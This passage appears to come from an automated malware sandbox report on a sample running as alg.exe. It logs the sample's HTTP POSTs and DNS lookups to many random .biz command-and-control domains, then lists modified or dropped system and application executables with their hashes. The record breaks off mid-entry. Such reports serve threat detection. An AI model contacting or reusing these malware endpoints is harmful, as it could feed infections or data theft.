                              http
                              alg.exe
                              1.4kB
                              667 B
                              6
                              6

                              HTTP Request

                              POST http://ssbzmoy.biz/g

                              HTTP Response

                              200
                            • 54.244.188.177:80
                              cvgrf.biz
                              alg.exe
                              152 B
                              3
                            • 54.244.188.177:80
                              cvgrf.biz
                              alg.exe
                              152 B
                              3
                            • 44.221.84.105:80
                              http://npukfztj.biz/bwkltopmnrvvwfg
                              http
                              alg.exe
                              1.4kB
                              668 B
                              6
                              6

                              HTTP Request

                              POST http://npukfztj.biz/bwkltopmnrvvwfg

                              HTTP Response

                              200
                            • 172.234.222.143:80
                              http://przvgke.biz/tloyfjsdxsgslusj
                              http
                              alg.exe
                              3.6kB
                              1.3kB
                              12
                              8

                              HTTP Request

                              POST http://przvgke.biz/ye

                              HTTP Response

                              302

                              HTTP Request

                              POST http://przvgke.biz/tloyfjsdxsgslusj

                              HTTP Response

                              302
                            • 72.52.179.174:80
                              http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              http
                              alg.exe
                              940 B
                              729 B
                              6
                              4

                              HTTP Request

                              GET http://ww99.przvgke.biz/ye

                              HTTP Response

                              302

                              HTTP Request

                              GET http://ww99.przvgke.biz/tloyfjsdxsgslusj

                              HTTP Response

                              302
                            • 199.59.243.227:80
                              http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              http
                              alg.exe
                              679 B
                              2.5kB
                              7
                              7

                              HTTP Request

                              GET http://ww7.przvgke.biz/ye?usid=24&utid=9739925920

                              HTTP Response

                              200
                            • 76.223.26.96:80
                              http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              http
                              alg.exe
                              970 B
                              17.8kB
                              13
                              18

                              HTTP Request

                              GET http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020

                              HTTP Response

                              200
                            • 18.141.10.107:80
                              http://knjghuig.biz/eovjrsnxfvivsmj
                              http
                              alg.exe
                              1.4kB
                              668 B
                              6
                              6

                              HTTP Request

                              POST http://knjghuig.biz/eovjrsnxfvivsmj

                              HTTP Response

                              200
                            • 82.112.184.197:80
                              lpuegx.biz
                              alg.exe
                              152 B
                              3
                            • 82.112.184.197:80
                              lpuegx.biz
                              alg.exe
                              152 B
                              3
                            • 82.112.184.197:80
                              vjaxhpbji.biz
                              alg.exe
                              152 B
                              3
                            • 8.8.8.8:53
                              pywolwnvd.biz
                              dns
                              alg.exe
                              59 B
                              75 B
                              1
                              1

                              DNS Request

                              pywolwnvd.biz

                              DNS Response

                              54.244.188.177

                            • 8.8.8.8:53
                              pywolwnvd.biz
                              dns
                              alg.exe
                              59 B
                              75 B
                              1
                              1

                              DNS Request

                              pywolwnvd.biz

                              DNS Response

                              54.244.188.177

                            • 8.8.8.8:53
                              ssbzmoy.biz
                              dns
                              alg.exe
                              57 B
                              73 B
                              1
                              1

                              DNS Request

                              ssbzmoy.biz

                              DNS Response

                              18.141.10.107

                            • 8.8.8.8:53
                              cvgrf.biz
                              dns
                              alg.exe
                              55 B
                              71 B
                              1
                              1

                              DNS Request

                              cvgrf.biz

                              DNS Response

                              54.244.188.177

                            • 8.8.8.8:53
                              npukfztj.biz
                              dns
                              alg.exe
                              58 B
                              74 B
                              1
                              1

                              DNS Request

                              npukfztj.biz

                              DNS Response

                              44.221.84.105

                            • 8.8.8.8:53
                              przvgke.biz
                              dns
                              alg.exe
                              57 B
                              89 B
                              1
                              1

                              DNS Request

                              przvgke.biz

                              DNS Response

                              172.234.222.143
                              172.234.222.138

                            • 8.8.8.8:53
                              ww99.przvgke.biz
                              dns
                              alg.exe
                              62 B
                              78 B
                              1
                              1

                              DNS Request

                              ww99.przvgke.biz

                              DNS Response

                              72.52.179.174

                            • 8.8.8.8:53
                              ww7.przvgke.biz
                              dns
                              alg.exe
                              61 B
                              106 B
                              1
                              1

                              DNS Request

                              ww7.przvgke.biz

                              DNS Response

                              199.59.243.227

                            • 8.8.8.8:53
                              ww12.przvgke.biz
                              dns
                              alg.exe
                              62 B
                              130 B
                              1
                              1

                              DNS Request

                              ww12.przvgke.biz

                              DNS Response

                              76.223.26.96
                              13.248.148.254

                            • 8.8.8.8:53
                              zlenh.biz
                              dns
                              alg.exe
                              55 B
                              117 B
                              1
                              1

                              DNS Request

                              zlenh.biz

                            • 8.8.8.8:53
                              knjghuig.biz
                              dns
                              alg.exe
                              58 B
                              74 B
                              1
                              1

                              DNS Request

                              knjghuig.biz

                              DNS Response

                              18.141.10.107

                            • 8.8.8.8:53
                              uhxqin.biz
                              dns
                              alg.exe
                              56 B
                              118 B
                              1
                              1

                              DNS Request

                              uhxqin.biz

                            • 8.8.8.8:53
                              anpmnmxo.biz
                              dns
                              alg.exe
                              58 B
                              120 B
                              1
                              1

                              DNS Request

                              anpmnmxo.biz

                            • 8.8.8.8:53
                              lpuegx.biz
                              dns
                              alg.exe
                              56 B
                              72 B
                              1
                              1

                              DNS Request

                              lpuegx.biz

                              DNS Response

                              82.112.184.197

                            • 8.8.8.8:53
                              vjaxhpbji.biz
                              dns
                              alg.exe
                              59 B
                              75 B
                              1
                              1

                              DNS Request

                              vjaxhpbji.biz

                              DNS Response

                              82.112.184.197

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

                              Filesize

                              1.3MB

                              MD5

                              5d7d08244224ff2efe487c4f2750cf9f

                              SHA1

                              b14a9018e5dd60eafe96b8d9df7ee618d7df8c9b

                              SHA256

                              c8b895121edc1a2bfbd99ff8c66cd2fefbf924a9c5ba4299926576e38414e95e

                              SHA512

                              5cd311019335212e6d0c9e7837c470b47c2068430f5b4e0bc69f08d238cdd116a3e82f15b64db64409cf803f4119a7bb2896c553b1eeccd1607f9d4e5882a7dd

                            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

                              Filesize

                              1.6MB

                              MD5

                              1d4b7672a6746e4654b521fdc03cc9d9

                              SHA1

                              6b0848d2fffe89bb3783ce6d2e8673390a9b444b

                              SHA256

                              f3efea7127511f016e7a63bd7c4c7d302ea42560d01565c135803881bc5ae094

                              SHA512

                              4e7fe6f24db5738a95423fbbca3d36df5edb3b6ed87c50e48e8542c804e11048082f65cc439004369a1b45df0f1c6d5f849632cffb0ddcf5d5d621c06f6c6051

                            • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE

                              Filesize

                              1.3MB

                              MD5

                              6c55a433db715deee70b2150e94ec8a9

                              SHA1

                              af00ccbb297bd947a25eeb776b1127e090a460fb

                              SHA256

                              6f5c445e12103a5d03f07dcc43cefac47126d4b58717b3371b6350f846458fac

                              SHA512

                              60321b14cb642e4d2f84825e6748aa6ec6b92cfd3a23fdb1b039807d79eaa897727847c5a340dbc32e05db1f878693d87177075241117e380873631b485c22bc

                            • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe

                              Filesize

                              1.7MB

                              MD5

                              bec7832455177a9f2a8e5263edd1df08

                              SHA1

                              dca9f9a21ceb2c6d07a48ebca9490eb084093c10

                              SHA256

                              456dbfe2bd4efaef1dcb802be578913d357d6935f73d964d02831408b3b31fc5

                              SHA512

                              4459828e1a82cb28d34083532390805a12a0c4cb55e48e35d9bdbf007c8515db643342798388d726cc3ac7aedac5474d6bb83fc3554855a6d676cbf4c85362bb

                            • C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

                              Filesize

                              1.3MB

                              MD5

                              0bc93dba61d9559d6f118d21d0bd256a

                              SHA1

                              9ee7dc29f04397ea4bc66964432b5f94fbc17261

                              SHA256

                              75af23e3541c5ad975c13ce0924ac540717053d33dff42df62c0fda92f8f76b0

                              SHA512

                              018f5c2e1266112079db29a28af139b82007cd3f9448efeaa6c6ba0dc4e65e04d397ba9c459e09c9f3e5549a2fd214767f54dbb51cfac55e3d0073cb4b195ffb

                            • C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

                              Filesize

                              30.1MB

                              MD5

                              6b84b057ebe4e89acfdedc1f3aca7f11

                              SHA1

                              0ce55addf4be07fb0a8e2f91b580c1e61175f20b

                              SHA256

                              cf2e136ec10ff329e39e85d0528b82b8807ee53e452a65b7dce1b798ce622546

                              SHA512

                              b20363b4e5f1b3efa79bff533117c3db6b6d2ba67521949209f03b306bde70ddd0a1470501bd026f998cf5b781973e1bc0b603500f59a3b67900730c5be518bd

                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                              Filesize

                              1.4MB

                              MD5

                              6cde2cee31bddf39cb9f9529015bf629

                              SHA1

                              7260797b92eb724f38b50567132671111251b3bf

                              SHA256

                              ac2312669a1ecdc77721d2451dad98c81aa03078d7ec2dcbd5664b73373b9a5b

                              SHA512

                              d17e6af4ab99fdc03aca286b1c56a04d5453e63579e1bd94a1dac10303cb3054267221ffc07e59eadf70eea3baf6bfa9c66e66e65baa81463911b746944d8a4a

                            • C:\Program Files\7-Zip\7z.exe

                              Filesize

                              1.7MB

                              MD5

                              ec679fdb56a5685e0ac7d3d9d289533f

                              SHA1

                              3b3fac385ee1605948a7efe94d15f72d55c3fadc

                              SHA256

                              41b7b29ab7d3b6c5693575b3c6910c42fe2ec456883c9f83cd9bc0fd949d7284

                              SHA512

                              c2a1670577323fd1057d89cb281176d9695ec3fc8e22602b25914de2bd50c2e6c2484333e4232c7d6b17763656652665fb8607e6f061fc4c18c852c5749b4acd

                            • C:\Program Files\7-Zip\7zFM.exe

                              Filesize

                              1.5MB

                              MD5

                              f3aeeef503b42ef7cd4f664a082eb5d0

                              SHA1

                              84e67f238a8f34b23e9c8c40b55a25591f29d51c

                              SHA256

                              2bb5d72dd57893a47add855f16b533988a19ae6e8d454b7b18bfb82926a0be1d

                              SHA512

                              680046b6ebbd5cf215a29818c5eacaf1198aacc4767c663239c9927792d74feba49566f4b30f6b912d851a0a626653560f2822257a25c9e927cda4e2c1ddce14

                            • C:\Program Files\7-Zip\7zG.exe

                              Filesize

                              1.2MB

                              MD5

                              048e4d7e86fa258e8d29e6fcb5946bce

                              SHA1

                              179bd9238b4d8c40c5ebeba7e8a18e5cbd92f6a4

                              SHA256

                              bfa38873a11eba6bd723f2442754dfb9a7ac62b568d0ed85b8a6bb276e63e3ad

                              SHA512

                              6b9ed4e65b3b5a53b4f0f4cb082b233b826504c8b89ee31b6b9807210a256c9166eb82bd3393cf57fa8670ce3efd54b4403c759317c926af3a6ea5c90685785e

                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

                              Filesize

                              2.1MB

                              MD5

                              02ff624ec9adbdd3a9fc38caef79d000

                              SHA1

                              3862df1b32e824eb649a209eebfda7be7e0890fd

                              SHA256

                              fe38fa95af17fd57e876a5aa5d9d78b6d71053a3c9c5dbbe766c9f447a333822

                              SHA512

                              77871c9966080752b249f87e3a444d3e8d2f55951af419dd40d2a08e939e56787b37dc5849d752bd21795d7ae7e4b30675d523ec8ead0f390d8ca7aa7f7eabbc

                            • C:\Users\Admin\AppData\Local\Temp\Cab4E61.tmp

                              Filesize

                              70KB

                              MD5

                              49aebf8cbd62d92ac215b2923fb1b9f5

                              SHA1

                              1723be06719828dda65ad804298d0431f6aff976

                              SHA256

                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                              SHA512

                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b91050d8b077a4e8.customDestinations-ms

                              Filesize

                              24B

                              MD5

                              b9bd716de6739e51c620f2086f9c31e4

                              SHA1

                              9733d94607a3cba277e567af584510edd9febf62

                              SHA256

                              7116ff028244a01f3d17f1d3bc2e1506bc9999c2e40e388458f0cccc4e117312

                              SHA512

                              cef609e54c7a81a646ad38dba7ac0b82401b220773b9c792cefac80c6564753229f0c011b34ffb56381dd3154a19aee2bf5f602c4d1af01f2cf0fbc1574e4478

                            • C:\Users\Admin\Documents\VlcpVideoV1.0.1\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe

                              Filesize

                              4.3MB

                              MD5

                              3aa667aff44754cd87a6eb4cb347a91b

                              SHA1

                              1013d521a4b5f6a5e1a39773c0cdb9364a0ae618

                              SHA256

                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

                              SHA512

                              a392b44659e052edf0b027648eea2b69a6043c1eb4bdc4f38c1310dfb86c0f8e950329a7e89ace02f1c331189786c0adb0eec328dba4ac62aca595922c3e6238

                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log

                              Filesize

                              872KB

                              MD5

                              c5129e913f6632da8a799e5ea3f17d6c

                              SHA1

                              5b63e8d7d9f88431f197cf47006d3f2d00691101

                              SHA256

                              548c26e9c4d20297c9778de2e8a2f05586912162048d3357e144bc11cdb11d9f

                              SHA512

                              4902dd89a20462278ce3cb4145eb96c727c60d9ae9b099fb9cba162e55586c0b07445d56faf91b2e6e3f1373696148bdd9086e547d3970eeb411c25a9842d2a5

                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

                              Filesize

                              1.2MB

                              MD5

                              c59125a6e2abc0a0cd80cb13cd261ac2

                              SHA1

                              f0b4cf8459049b892427c08df676e2cd4259b69a

                              SHA256

                              9f73a2aba5b9f93608fc8453ea9d0bf7ad33a394b7c3bcc357eb677e73b6fbf4

                              SHA512

                              c6aadee40e3c4e8a4c8c325f974042faabcc2082151955dced87aa2c2ad9dcbbd73b3307d79f9924afd204b44c8dc50ce23eac26fa35f6e3bfb8c034f2e57649

                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

                              Filesize

                              1.3MB

                              MD5

                              78a7b3987c5611598a3be1c3ecb1f3a8

                              SHA1

                              16f3b5aa2bd0909eec6052a162db120a4522b502

                              SHA256

                              37ea449255fcdaf04fdfb75f5e8436277694690f0701640df58814bdc04c229e

                              SHA512

                              0ba12ad04ade3d5880b73e660453534b0823068505587ad5423e40f72235785b8327b240cd87bdaf47bed6e736a770e72f3d44b383f6d5638b3a219e4e2f5c56

                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

                              Filesize

                              1.2MB

                              MD5

                              fb92952a0b1adb003bb442bf69d30360

                              SHA1

                              4ddcb6036a7f7b3a699263727661ea01d2b7c468

                              SHA256

                              a0ea759e9a6881cf3c3805c91d85e9f3181068d39423b6ccb8937688d07981ad

                              SHA512

                              249effe3949e58f18e16d756234912733f9fbabebebe1eaef6f9e5adba0cdbc72ec8e2eb54f11e550d8a458b2895ad7573fd3cda21c79eaf05407242d921a170

                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen_service.log

                              Filesize

                              1003KB

                              MD5

                              5ebda1c16f069250ba35820eab7d9d17

                              SHA1

                              0235f68666f4045d5a6bd5d3a5037b11e80d3c0c

                              SHA256

                              2adb069cb2da8bfa1bb0c93e573b59c7b78c2007d1f6b7f50df104833d059472

                              SHA512

                              f9bad25c1199426b491ebdc3dcd3e676ea13fb55c1ef0201b941cfadbd29bba81979ca3c8292e250e41b151db119f5c635dc8cceced5c22a3e5aa11a4194b034

                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

                              Filesize

                              1.3MB

                              MD5

                              cf69c1201fd2b50bfe140d750ef10d09

                              SHA1

                              e127a982f6f0ac1b514f69121a67da4840da94eb

                              SHA256

                              910ffa2e048de2fe5c4095725f9fc4fffc40367b3abd3ceae77d94c9c4c9510a

                              SHA512

                              316d7077db045955633aaeaafcf9b8092958e15dcc1ca6870e5ddd4e40620b77e3571f093ed17be098032a8340b13173c700f72469da4431c758ee2d623cacc5

                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log

                              Filesize

                              8KB

                              MD5

                              12606a2cc53168b002721d0cd36c3759

                              SHA1

                              d864456471412413ece132ccb5420c3579880882

                              SHA256

                              911b9fcbee58f18e20535ba2bb983894d4255c78fa9a0fb6001bc2b78225c9b2

                              SHA512

                              b51c52e59d9014174150056243655260f98b56b589034b95a9489b529c7aa520fd0c1551ed44bb768987c4064230f4815d8c8af2100d0e0dae90afc2b2e59385

                            • C:\Windows\System32\alg.exe

                              Filesize

                              1.3MB

                              MD5

                              2f9a5bc365bacd4a3414a0f45e1bdf49

                              SHA1

                              f5ecd0a93c29ac807ed14a4a3b69329c7829832b

                              SHA256

                              f6ba61516a5650f3ad69cc2e164f7b513eda3680260583467f3c455821ba1273

                              SHA512

                              7d13ec0c7481c4810da21f6d6e4b46482b72459d2839faaa559435d46afe51e7f196c71cc862753205bb8ea47178ff7baca970dff342da0701912514aaac4a70

                            • C:\Windows\System32\msdtc.exe

                              Filesize

                              1.3MB

                              MD5

                              d141c7e9d279e2f3aa69053ea54af719

                              SHA1

                              92e0f39ba851ca9eab651ffebf1f45723c77cff7

                              SHA256

                              142e1fd28c0fdf937ced3564180930da4fc0601803e77a9cca5f7ed3f6208d2c

                              SHA512

                              bfc4d09c7da5b4baf9181281d75eb9c3629fc3cc0d0f899253604ebe4b5a1a0c0bdba77fffa30d7d73c6f52babb0a428d8f18e50d3dc227c61b80dec4e7326d1

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.Office.To#\e1f8e4d08d4b7f811b7dbbacd324027b\Microsoft.Office.Tools.v9.0.ni.dll

                              Filesize

                              148KB

                              MD5

                              ac901cf97363425059a50d1398e3454b

                              SHA1

                              2f8bd4ac2237a7b7606cb77a3d3c58051793c5c7

                              SHA256

                              f6c7aecb211d9aac911bf80c91e84a47a72ac52cbb523e34e9da6482c0b24c58

                              SHA512

                              6a340b6d5fa8e214f2a58d8b691c749336df087fa75bcc8d8c46f708e4b4ff3d68a61a17d13ee62322b75cbc61d39f5a572588772f3c5d6e5ff32036e5bc5a00

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\03cad6bd8b37d21b28dcb4f955be2158\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.ni.dll

                              Filesize

                              34KB

                              MD5

                              c26b034a8d6ab845b41ed6e8a8d6001d

                              SHA1

                              3a55774cf22d3244d30f9eb5e26c0a6792a3e493

                              SHA256

                              620b41f5e02df56c33919218bedc238ca7e76552c43da4f0f39a106835a4edc3

                              SHA512

                              483424665c3bc79aeb1de6dfdd633c8526331c7b271b1ea6fe93ab298089e2aceefe7f9c7d0c6e33e604ca7b2ed62e7bb586147fecdf9a0eea60e8c03816f537

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\0cb958acb9cd4cacb46ebc0396e30aa3\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.ni.dll

                              Filesize

                              109KB

                              MD5

                              0fd0f978e977a4122b64ae8f8541de54

                              SHA1

                              153d3390416fdeba1b150816cbbf968e355dc64f

                              SHA256

                              211d2b83bb82042385757f811d90c5ae0a281f3abb3bf1c7901e8559db479e60

                              SHA512

                              ceddfc031bfe4fcf5093d0bbc5697b5fb0cd69b03bc32612325a82ea273dae5daff7e670b0d45816a33307b8b042d27669f5d5391cb2bdcf3e5a0c847c6dcaa8

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\30d8d74bfb1ebaca288cf641df28baa2\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.ni.dll

                              Filesize

                              187KB

                              MD5

                              789ad49be8c73b60ac94dba7598186b9

                              SHA1

                              ee15d43e6b54cd200ede3fd7866936def49c6925

                              SHA256

                              0eaab3aa92bb521808cb59ed0ca37a56cdcab4cfc54534524e66d87a7d4eae4c

                              SHA512

                              e8d0adb894b9f182020a4aea618247f9ed3b1acf4f50e6555164a79baed46e68790e49db9261654f20087f5f0cdf30839ace9d6490ce7d7b0778dfe1c2f40ae5

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\367516b7878af19f5c84c67f2cd277ae\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.ni.dll

                              Filesize

                              41KB

                              MD5

                              3c269caf88ccaf71660d8dc6c56f4873

                              SHA1

                              f9481bf17e10fe1914644e1b590b82a0ecc2c5c4

                              SHA256

                              de21619e70f9ef8ccbb274bcd0d9d2ace1bae0442dfefab45976671587cf0a48

                              SHA512

                              bd5be3721bf5bd4001127e0381a0589033cb17aa35852f8f073ba9684af7d8c5a0f3ee29987b345fc15fdf28c5b56686087001ef41221a2cfb16498cf4c016c6

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\8c6bac317f75b51647ea3a8da141b143\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.ni.dll

                              Filesize

                              210KB

                              MD5

                              4f40997b51420653706cb0958086cd2d

                              SHA1

                              0069b956d17ce7d782a0e054995317f2f621b502

                              SHA256

                              8cd6a0b061b43e0b660b81859c910290a3672b00d7647ba0e86eda6ddcc8c553

                              SHA512

                              e18953d7a348859855e5f6e279bc9924fc3707b57a733ce9b8f7d21bd631d419f1ebfb29202608192eb346569ca9a55264f5b4c2aedd474c22060734a68a4ee6

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\9306fc630870a75ddd23441ad77bdc57\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.ni.dll

                              Filesize

                              53KB

                              MD5

                              e3a7a2b65afd8ab8b154fdc7897595c3

                              SHA1

                              b21eefd6e23231470b5cf0bd0d7363879a2ed228

                              SHA256

                              e5faf5e8adf46a8246e6b5038409dadca46985a9951343a1936237d2c8d7a845

                              SHA512

                              6537c7ed398deb23be1256445297cb7c8d7801bf6e163d918d8e258213708b28f7255ecff9fbd3431d8f5e5a746aa95a29d3a777b28fcd688777aed6d8205a33

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\a00997308a0b23912e36a73e1fa45144\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.ni.dll

                              Filesize

                              180KB

                              MD5

                              c1400300d1f2be545f487152d0e014e8

                              SHA1

                              9ef0a14140245daffbc03652742ad6c7a6bef4a8

                              SHA256

                              692382e07a45e45c627e9aaa0859a073b94ee1d6934e5977121ec1310d0a4662

                              SHA512

                              58f9664a2f6752353e9e8ef441816008bf094716417ac485dfcf17fafcb44dd352153d3a75ed3d293f71efa26eb62cbcd0e6dc09f0261991a87ba017744a437c

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\afa5bb1a39443d7dc81dfff54073929b\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.ni.dll

                              Filesize

                              28KB

                              MD5

                              aefc3f3c8e7499bad4d05284e8abd16c

                              SHA1

                              7ab718bde7fdb2d878d8725dc843cfeba44a71f7

                              SHA256

                              4436550409cfb3d06b15dd0c3131e87e7002b0749c7c6e9dc3378c99dbec815d

                              SHA512

                              1d7dbc9764855a9a1f945c1bc8e86406c0625f1381d71b3ea6924322fbe419d1c70c3f3efd57ee2cb2097bb9385e0bf54965ab789328a80eb4946849648fe20b

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\b1bb26704e7a1e8959bfae7d15a7badd\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.ni.dll

                              Filesize

                              83KB

                              MD5

                              62a6692e70ba10c10f88a63eafad12ab

                              SHA1

                              f577a294171abdff955541670f6d02fe5f218b95

                              SHA256

                              742e2c38189c4d9834132498cbfcb62f49726926e4cb65c797e6cb7966c1108b

                              SHA512

                              5dae4ca04b81c33202efd60cb512827b69290ed8e142911ba22a3a4516d3eea145c89d75124b00d9f92a556f0cf5ca780df1b15a885b93972c592bc5f8553b84

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\de06a98a598aa0ff716a25b24d56ad7f\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.ni.dll

                              Filesize

                              27KB

                              MD5

                              9c60454398ce4bce7a52cbda4a45d364

                              SHA1

                              da1e5de264a6f6051b332f8f32fa876d297bf620

                              SHA256

                              edc90887d38c87282f49adbb12a94040f9ac86058bfae15063aaaff2672b54e1

                              SHA512

                              533b7e9c55102b248f4a7560955734b4156eb4c02539c6f978aeacecff1ff182ba0f04a07d32ed90707a62d73191b0e2d2649f38ae1c3e7a5a4c0fbea9a94300

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\e0220058091b941725ef02be0b84abe7\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.ni.dll

                              Filesize

                              57KB

                              MD5

                              6eaaa1f987d6e1d81badf8665c55a341

                              SHA1

                              e52db4ad92903ca03a5a54fdb66e2e6fad59efd5

                              SHA256

                              4b78ffa5f0b6751aea11917db5961d566e2f59beaa054b41473d331fd392329e

                              SHA512

                              dbedfa6c569670c22d34d923e22b7dae7332b932b809082dad87a1f0bb125c912db37964b5881667867ccf23dc5e5be596aad85485746f8151ce1c51ffd097b2

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\ee73646032cbb022d16771203727e3b2\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.ni.dll

                              Filesize

                              130KB

                              MD5

                              2735d2ab103beb0f7c1fbd6971838274

                              SHA1

                              6063646bc072546798bf8bf347425834f2bfad71

                              SHA256

                              f00156860ec7e88f4ccb459ca29b7e0e5c169cdc8a081cb043603187d25d92b3

                              SHA512

                              fe2ce60c7f61760a29344e254771d48995e983e158da0725818f37441f9690bda46545bf10c84b163f6afb163ffb504913d6ffddf84f72b062c7f233aed896de

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\f030ae7a0ac8395493f8afcd319ee692\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.ni.dll

                              Filesize

                              143KB

                              MD5

                              f786ebe6116b55d4dc62a63dfede2ca6

                              SHA1

                              ab82f3b24229cf9ad31484b3811cdb84d5e916e9

                              SHA256

                              9805ae745d078fc9d64e256d4472c0edd369958a6872d71bd28d245a0239fe12

                              SHA512

                              80832872329611c5c68784196f890859f6f7c5795f6a62542ad20be813e587341b36ade410363646c43f9ced48d2cf89a4537fe60d90e868324270f7040c2738

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\f1a7ac664667f2d6bcd6c388b230c22b\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.ni.dll

                              Filesize

                              59KB

                              MD5

                              8c69bbdfbc8cc3fa3fa5edcd79901e94

                              SHA1

                              b8028f0f557692221d5c0160ec6ce414b2bdf19b

                              SHA256

                              a21471690e7c32c80049e17c13624820e77bca6c9c38b83d9ea8a7248086660d

                              SHA512

                              825f5b87b76303b62fc16a96b108fb1774c2aca52ac5e44cd0ac2fe2ee47d5d67947dfe7498e36bc849773f608ec5824711f8c36e375a378582eefb57c9c2557

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\fc36797f7054935a6033077612905a0f\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.ni.dll

                              Filesize

                              42KB

                              MD5

                              71d4273e5b77cf01239a5d4f29e064fc

                              SHA1

                              e8876dea4e4c4c099e27234742016be3c80d8b62

                              SHA256

                              f019899f829731f899a99885fd52fde1fe4a4f6fe3ecf7f7a7cfa78517c00575

                              SHA512

                              41fe67cda988c53bd087df6296d1a242cddac688718ea5a5884a72b43e9638538e64d7a59e045c0b4d490496d884cf0ec694ddf7fcb41ae3b8cbc65b7686b180

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\ehiVidCtl\88e20c69254157d91b96eadc9444815d\ehiVidCtl.ni.dll

                              Filesize

                              855KB

                              MD5

                              7812b0a90d92b4812d4063b89a970c58

                              SHA1

                              3c4a789b8d28a5bfa6a6191624e33b8f40e4c4ea

                              SHA256

                              897626e6af00e85e627eeaa7f9563b245335242bc6196b36d0072e5b6d45e543

                              SHA512

                              634a2395bada9227b1957f2b76ed7e19f12bfc4d71a145d182602a1b6e24d83e220ebfabd602b1995c360e1725a38a89ff58417b0295bb0da9ea35c41c21a6ed

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\stdole\2c6d60b55bbab22515c512080d4b3bae\stdole.ni.dll

                              Filesize

                              43KB

                              MD5

                              3e72bdd0663c5b2bcd530f74139c83e3

                              SHA1

                              66069bcac0207512b9e07320f4fa5934650677d2

                              SHA256

                              6a6ac3094130d1affd34aae5ba2bd8c889e2071eb4217a75d72b5560f884e357

                              SHA512

                              b0a98db477fccae71b4ebfb8525ed52c10f1e7542f955b307f260e27e0758aa22896683302e34b0237e7e3bba9f5193ddcc7ff255c71fbaa1386988b0ec7d626

                            • C:\Windows\ehome\ehsched.exe

                              Filesize

                              1.3MB

                              MD5

                              520044dd0ff6475aa86cd7048166f840

                              SHA1

                              90facb4c40baf266e9445a664ce71df21ae51efd

                              SHA256

                              c6b131dde4ac8694d74550d56bd3392d624f3307e728c889d1b8c089e89d2397

                              SHA512

                              aef2e4e7f07d59105b89901d4dd5faeeb998f1da8985d148427d4fc0e0a447a97dad17ac4c49b33feaee97e9ac9bcc66d173ccc5d5582ed27b30bab66b498491

                            • C:\Windows\system32\fxssvc.exe

                              Filesize

                              1.2MB

                              MD5

                              88d6cea9cd01c0e57d51b05f59e8f42c

                              SHA1

                              4b3b94fbbc3f212524179ab22363d1851f1332ab

                              SHA256

